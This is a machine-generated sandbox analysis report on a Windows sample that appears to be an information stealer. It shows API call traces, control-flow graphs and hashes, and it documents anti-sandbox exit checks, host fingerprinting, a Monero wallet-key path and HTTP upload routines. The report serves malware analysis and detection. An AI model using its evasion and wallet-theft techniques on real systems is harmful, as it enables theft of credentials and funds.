                            • GetProcAddress.KERNEL32(74DD0000,00D359B0), ref: 000EA2DA
                            • GetProcAddress.KERNEL32(74DD0000,00D4D368), ref: 000EA2F2
                            • GetProcAddress.KERNEL32(74DD0000,00D4D158), ref: 000EA30A
                            • GetProcAddress.KERNEL32(74DD0000,00D35830), ref: 000EA323
                            • GetProcAddress.KERNEL32(74DD0000,00D358D0), ref: 000EA33B
                            • LoadLibraryA.KERNEL32(00D4D3B0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA34D
                            • LoadLibraryA.KERNEL32(00D4D2A8,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA35E
                            • LoadLibraryA.KERNEL32(00D4D1B8,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA370
                            • LoadLibraryA.KERNEL32(00D4D170,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA382
                            • LoadLibraryA.KERNEL32(00D4D188,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA393
                            • LoadLibraryA.KERNEL32(00D4D1D0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA3A5
                            • LoadLibraryA.KERNEL32(00D4D2C0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA3B7
                            • LoadLibraryA.KERNEL32(00D4D2F0,?,000E5EF3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE7), ref: 000EA3C8
                            • GetProcAddress.KERNEL32(75290000,00D356D0), ref: 000EA3EA
                            • GetProcAddress.KERNEL32(75290000,00D4D3F8), ref: 000EA402
                            • GetProcAddress.KERNEL32(75290000,00D490E8), ref: 000EA41A
                            • GetProcAddress.KERNEL32(75290000,00D4D578), ref: 000EA433
                            • GetProcAddress.KERNEL32(75290000,00D358F0), ref: 000EA44B
                            • GetProcAddress.KERNEL32(6FCD0000,00D3BAB8), ref: 000EA470
                            • GetProcAddress.KERNEL32(6FCD0000,00D35850), ref: 000EA489
                            • GetProcAddress.KERNEL32(6FCD0000,00D3B928), ref: 000EA4A1
                            • GetProcAddress.KERNEL32(6FCD0000,00D4D5A8), ref: 000EA4B9
                            • GetProcAddress.KERNEL32(6FCD0000,00D4D428), ref: 000EA4D2
                            • GetProcAddress.KERNEL32(6FCD0000,00D358B0), ref: 000EA4EA
                            • GetProcAddress.KERNEL32(6FCD0000,00D357D0), ref: 000EA502
                            • GetProcAddress.KERNEL32(6FCD0000,00D4D4B8), ref: 000EA51B
                            • GetProcAddress.KERNEL32(752C0000,00D357F0), ref: 000EA53C
                            • GetProcAddress.KERNEL32(752C0000,00D35990), ref: 000EA554
                            • GetProcAddress.KERNEL32(752C0000,00D4D590), ref: 000EA56D
                            • GetProcAddress.KERNEL32(752C0000,00D4D410), ref: 000EA585
                            • GetProcAddress.KERNEL32(752C0000,00D35870), ref: 000EA59D
                            • GetProcAddress.KERNEL32(74EC0000,00D3B9C8), ref: 000EA5C3
                            • GetProcAddress.KERNEL32(74EC0000,00D3B8B0), ref: 000EA5DB
                            • GetProcAddress.KERNEL32(74EC0000,00D4D4D0), ref: 000EA5F3
                            • GetProcAddress.KERNEL32(74EC0000,00D359F0), ref: 000EA60C
                            • GetProcAddress.KERNEL32(74EC0000,00D356F0), ref: 000EA624
                            • GetProcAddress.KERNEL32(74EC0000,00D3B9A0), ref: 000EA63C
                            • GetProcAddress.KERNEL32(75BD0000,00D4D440), ref: 000EA662
                            • GetProcAddress.KERNEL32(75BD0000,00D35950), ref: 000EA67A
                            • GetProcAddress.KERNEL32(75BD0000,00D48F38), ref: 000EA692
                            • GetProcAddress.KERNEL32(75BD0000,00D4D4E8), ref: 000EA6AB
                            • GetProcAddress.KERNEL32(75BD0000,00D4D530), ref: 000EA6C3
                            • GetProcAddress.KERNEL32(75BD0000,00D359D0), ref: 000EA6DB
                            • GetProcAddress.KERNEL32(75BD0000,00D35890), ref: 000EA6F4
                            • GetProcAddress.KERNEL32(75BD0000,00D4D470), ref: 000EA70C
                            • GetProcAddress.KERNEL32(75BD0000,00D4D458), ref: 000EA724
                            • GetProcAddress.KERNEL32(75A70000,00D356B0), ref: 000EA746
                            • GetProcAddress.KERNEL32(75A70000,00D4D488), ref: 000EA75E
                            • GetProcAddress.KERNEL32(75A70000,00D4D4A0), ref: 000EA776
                            • GetProcAddress.KERNEL32(75A70000,00D4D548), ref: 000EA78F
                            • GetProcAddress.KERNEL32(75A70000,00D4D500), ref: 000EA7A7
                            • GetProcAddress.KERNEL32(75450000,00D35710), ref: 000EA7C8
                            • GetProcAddress.KERNEL32(75450000,00D35730), ref: 000EA7E1
                            • GetProcAddress.KERNEL32(75DA0000,00D35910), ref: 000EA802
                            • GetProcAddress.KERNEL32(75DA0000,00D4D518), ref: 000EA81A
                            • GetProcAddress.KERNEL32(6F070000,00D357B0), ref: 000EA840
                            • GetProcAddress.KERNEL32(6F070000,00D35930), ref: 000EA858
                            • GetProcAddress.KERNEL32(6F070000,00D35A10), ref: 000EA870
                            • GetProcAddress.KERNEL32(6F070000,00D4D560), ref: 000EA889
                            • GetProcAddress.KERNEL32(6F070000,00D35750), ref: 000EA8A1
                            • GetProcAddress.KERNEL32(6F070000,00D35A30), ref: 000EA8B9
                            • GetProcAddress.KERNEL32(6F070000,00D35810), ref: 000EA8D2
                            • GetProcAddress.KERNEL32(6F070000,00D35790), ref: 000EA8EA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 000EA901
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 000EA917
                            • GetProcAddress.KERNEL32(75AF0000,00D4CDF8), ref: 000EA939
                            • GetProcAddress.KERNEL32(75AF0000,00D49058), ref: 000EA951
                            • GetProcAddress.KERNEL32(75AF0000,00D4CF30), ref: 000EA969
                            • GetProcAddress.KERNEL32(75AF0000,00D4CE28), ref: 000EA982
                            • GetProcAddress.KERNEL32(75D90000,00D35A50), ref: 000EA9A3
                            • GetProcAddress.KERNEL32(6F9B0000,00D4D008), ref: 000EA9C4
                            • GetProcAddress.KERNEL32(6F9B0000,00D35770), ref: 000EA9DD
                            • GetProcAddress.KERNEL32(6F9B0000,00D4D098), ref: 000EA9F5
                            • GetProcAddress.KERNEL32(6F9B0000,00D4D020), ref: 000EAA0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 23ae403653e41177d95041240447ee309da6c4ca0cbcf4e4093b3f2bb7716af7
                            • Instruction ID: 30c03427a09459f6335758de2866a6ec4b5f4ab9d52ae4ad644d8efc7f851de3
                            • Opcode Fuzzy Hash: 23ae403653e41177d95041240447ee309da6c4ca0cbcf4e4093b3f2bb7716af7
                            • Instruction Fuzzy Hash: 886200B66182009FC346DFA9EDC9A667BFDB78F701F148A1AB909C3270D7359941CB60

                            Control-flow Graph (graph image not captured; legend: Executed / Not Executed)
                            control_flow_graph 801 d48d0-d4992 call eaab0 call d4800 call eaa50 * 5 InternetOpenA StrCmpCA 816 d499b-d499f 801->816 817 d4994 801->817 818 d4f1b-d4f43 InternetCloseHandle call eade0 call da210 816->818 819 d49a5-d4b1d call e8cf0 call eac30 call eabb0 call eab10 * 2 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eac30 call eabb0 call eab10 * 2 InternetConnectA 816->819 817->816 829 d4f45-d4f7d call eab30 call eacc0 call eabb0 call eab10 818->829 830 d4f82-d4ff2 call e8b20 * 2 call eaab0 call eab10 * 8 818->830 819->818 905 d4b23-d4b27 819->905 829->830 906 d4b29-d4b33 905->906 907 d4b35 905->907 908 d4b3f-d4b72 HttpOpenRequestA 906->908 907->908 909 d4f0e-d4f15 InternetCloseHandle 908->909 910 d4b78-d4e78 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eacc0 call eabb0 call eab10 call eac30 call eabb0 call eab10 call eaa50 call eac30 * 2 call eabb0 call eab10 * 2 call eade0 lstrlen call eade0 * 2 lstrlen call eade0 HttpSendRequestA 908->910 909->818 1021 d4e82-d4eac InternetReadFile 910->1021 1022 d4eae-d4eb5 1021->1022 1023 d4eb7-d4f09 InternetCloseHandle call eab10 1021->1023 1022->1023 1024 d4eb9-d4ef7 call eacc0 call eabb0 call eab10 1022->1024 1023->909 1024->1021
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D4965
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D498A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D4B0A
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000F0DDE,00000000,?,?,00000000,?,",00000000,?,00D4E778), ref: 000D4E38
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D4E54
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D4E68
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D4E99
                            • InternetCloseHandle.WININET(00000000), ref: 000D4EFD
                            • InternetCloseHandle.WININET(00000000), ref: 000D4F15
                            • HttpOpenRequestA.WININET(00000000,00D4E7B8,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D4B65
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • InternetCloseHandle.WININET(00000000), ref: 000D4F1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: dd5056c609372bed0fdca71e834b8ae8aff0e97e16cf92934350e9f1e0eee551
                            • Instruction ID: 0b90431203e08dc6d40854d96b6edcc69edb6b2f4cd48c6201a91e4d453009e1
                            • Opcode Fuzzy Hash: dd5056c609372bed0fdca71e834b8ae8aff0e97e16cf92934350e9f1e0eee551
                            • Instruction Fuzzy Hash: 3812EC72A11158AFCB15EB91DDA2FEEB379AF1A300F114199B10676093DF707B48CB62

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 e5760-e57c7 call e5d20 call eab30 * 3 call eaa50 * 4 1106 e57cc-e57d3 1090->1106 1107 e5827-e589c call eaa50 * 2 call d1590 call e5510 call eabb0 call eab10 call eade0 StrCmpCA 1106->1107 1108 e57d5-e5806 call eab30 call eaab0 call d1590 call e5440 1106->1108 1134 e58e3-e58f9 call eade0 StrCmpCA 1107->1134 1138 e589e-e58de call eaab0 call d1590 call e5440 call eabb0 call eab10 1107->1138 1124 e580b-e5822 call eabb0 call eab10 1108->1124 1124->1134 1139 e58ff-e5906 1134->1139 1140 e5a2c-e5a94 call eabb0 call eab30 * 2 call d16b0 call eab10 * 4 call d1670 call d1550 1134->1140 1138->1134 1143 e590c-e5913 1139->1143 1144 e5a2a-e5aaf call eade0 StrCmpCA 1139->1144 1270 e5d13-e5d16 1140->1270 1147 e596e-e59e3 call eaa50 * 2 call d1590 call e5510 call eabb0 call eab10 call eade0 StrCmpCA 1143->1147 1148 e5915-e5969 call eab30 call eaab0 call d1590 call e5440 call eabb0 call eab10 1143->1148 1162 e5ab5-e5abc 1144->1162 1163 e5be1-e5c49 call eabb0 call eab30 * 2 call d16b0 call eab10 * 4 call d1670 call d1550 1144->1163 1147->1144 1249 e59e5-e5a25 call eaab0 call d1590 call e5440 call eabb0 call eab10 1147->1249 1148->1144 1170 e5bdf-e5c64 call eade0 StrCmpCA 1162->1170 1171 e5ac2-e5ac9 1162->1171 1163->1270 1199 e5c78-e5ce1 call eabb0 call eab30 * 2 call d16b0 call eab10 * 4 call d1670 call d1550 1170->1199 1200 e5c66-e5c71 Sleep 1170->1200 1178 e5acb-e5b1e call eab30 call eaab0 call d1590 call e5440 call eabb0 call eab10 1171->1178 1179 e5b23-e5b98 call eaa50 * 2 call d1590 call e5510 call eabb0 call eab10 call eade0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 e5b9a-e5bda call eaab0 call d1590 call e5440 call eabb0 call eab10 1179->1275 1199->1270 1200->1106 1249->1144 1275->1170
                            APIs
                              • Part of subcall function 000EAB30: lstrlen.KERNEL32(000D4F55,?,?,000D4F55,000F0DDF), ref: 000EAB3B
                              • Part of subcall function 000EAB30: lstrcpy.KERNEL32(000F0DDF,00000000), ref: 000EAB95
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5894
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E58F1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5AA7
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000E5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5478
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5568
                              • Part of subcall function 000E5510: lstrlen.KERNEL32(00000000), ref: 000E557F
                              • Part of subcall function 000E5510: StrStrA.SHLWAPI(00000000,00000000), ref: 000E55B4
                              • Part of subcall function 000E5510: lstrlen.KERNEL32(00000000), ref: 000E55D3
                              • Part of subcall function 000E5510: lstrlen.KERNEL32(00000000), ref: 000E55FE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E59DB
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5B90
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5C5C
                            • Sleep.KERNEL32(0000EA60), ref: 000E5C6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 91bda2ef21a50cf5bdfe25d234b8d2fe32877924ac581729015b395df79706c7
                            • Instruction ID: d9dd9c064df2bf7285a9f18d81a7206f18d2c96c06d8fdec9b9905133cbcdbfb
                            • Opcode Fuzzy Hash: 91bda2ef21a50cf5bdfe25d234b8d2fe32877924ac581729015b395df79706c7
                            • Instruction Fuzzy Hash: 04E13071E106489ECB14FBA1EDA3EED737DAF59300F448568B50676193EF346A08CB62

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 e19f0-e1a1d call eade0 StrCmpCA 1304 e1a1f-e1a21 ExitProcess 1301->1304 1305 e1a27-e1a41 call eade0 1301->1305 1309 e1a44-e1a48 1305->1309 1310 e1a4e-e1a61 1309->1310 1311 e1c12-e1c1d call eab10 1309->1311 1313 e1bee-e1c0d 1310->1313 1314 e1a67-e1a6a 1310->1314 1313->1309 1316 e1acf-e1ae0 StrCmpCA 1314->1316 1317 e1aad-e1abe StrCmpCA 1314->1317 1318 e1a85-e1a94 call eab30 1314->1318 1319 e1b82-e1b93 StrCmpCA 1314->1319 1320 e1b63-e1b74 StrCmpCA 1314->1320 1321 e1bc0-e1bd1 StrCmpCA 1314->1321 1322 e1b41-e1b52 StrCmpCA 1314->1322 1323 e1ba1-e1bb2 StrCmpCA 1314->1323 1324 e1b1f-e1b30 StrCmpCA 1314->1324 1325 e1bdf-e1be9 call eab30 1314->1325 1326 e1afd-e1b0e StrCmpCA 1314->1326 1327 e1a99-e1aa8 call eab30 1314->1327 1328 e1a71-e1a80 call eab30 1314->1328 1334 e1aee-e1af1 1316->1334 1335 e1ae2-e1aec 1316->1335 1332 e1aca 1317->1332 1333 e1ac0-e1ac3 1317->1333 1318->1313 1344 e1b9f 1319->1344 1345 e1b95-e1b98 1319->1345 1342 e1b76-e1b79 1320->1342 1343 e1b80 1320->1343 1349 e1bdd 1321->1349 1350 e1bd3-e1bd6 1321->1350 1340 e1b5e 1322->1340 1341 e1b54-e1b57 1322->1341 1346 e1bbe 1323->1346 1347 e1bb4-e1bb7 1323->1347 1338 e1b3c 1324->1338 1339 e1b32-e1b35 1324->1339 1325->1313 1336 e1b1a 1326->1336 1337 e1b10-e1b13 1326->1337 1327->1313 1328->1313 1332->1313 1333->1332 1354 e1af8 1334->1354 1335->1354 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1343 1343->1313 1344->1313 1345->1344 1346->1313 1347->1346 1349->1313 1350->1349 1354->1313
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 000E1A15
                            • ExitProcess.KERNEL32 ref: 000E1A21
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 2d2214d6aba50bc85568e7c3c12641df3fedfccb37efdbd76a8e77a12d8aa21f
                            • Instruction ID: 6c98f7150f4e585494d295072fef19083ecf2268fc37c474be874af4f5022806
                            • Opcode Fuzzy Hash: 2d2214d6aba50bc85568e7c3c12641df3fedfccb37efdbd76a8e77a12d8aa21f
                            • Instruction Fuzzy Hash: 825157B4B0824AAFDB14DFA5D994BEE77B9EF44704F104448E502BB252E770E940DB62

                            Control-flow Graph

                            APIs
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42470), ref: 000E9BF1
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42380), ref: 000E9C0A
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42500), ref: 000E9C22
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D423B0), ref: 000E9C3A
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D423E0), ref: 000E9C53
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D48F68), ref: 000E9C6B
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D35B10), ref: 000E9C83
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D35D50), ref: 000E9C9C
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D424E8), ref: 000E9CB4
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42218), ref: 000E9CCC
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D424A0), ref: 000E9CE5
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42368), ref: 000E9CFD
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D35E50), ref: 000E9D15
                              • Part of subcall function 000E9BB0: GetProcAddress.KERNEL32(74DD0000,00D42410), ref: 000E9D2E
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000D11D0: ExitProcess.KERNEL32 ref: 000D1211
                              • Part of subcall function 000D1160: GetSystemInfo.KERNEL32(?), ref: 000D116A
                              • Part of subcall function 000D1160: ExitProcess.KERNEL32 ref: 000D117E
                              • Part of subcall function 000D1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000D112B
                              • Part of subcall function 000D1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 000D1132
                              • Part of subcall function 000D1110: ExitProcess.KERNEL32 ref: 000D1143
                              • Part of subcall function 000D1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000D123E
                              • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1258
                              • Part of subcall function 000D1220: __aulldiv.LIBCMT ref: 000D1266
                              • Part of subcall function 000D1220: ExitProcess.KERNEL32 ref: 000D1294
                              • Part of subcall function 000E6A10: GetUserDefaultLangID.KERNEL32 ref: 000E6A14
                              • Part of subcall function 000D1190: ExitProcess.KERNEL32 ref: 000D11C6
                              • Part of subcall function 000E79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7A10
                              • Part of subcall function 000E79E0: RtlAllocateHeap.NTDLL(00000000), ref: 000E7A17
                              • Part of subcall function 000E79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E7A2F
                              • Part of subcall function 000E7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7AA0
                              • Part of subcall function 000E7A70: RtlAllocateHeap.NTDLL(00000000), ref: 000E7AA7
                              • Part of subcall function 000E7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 000E7ABF
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
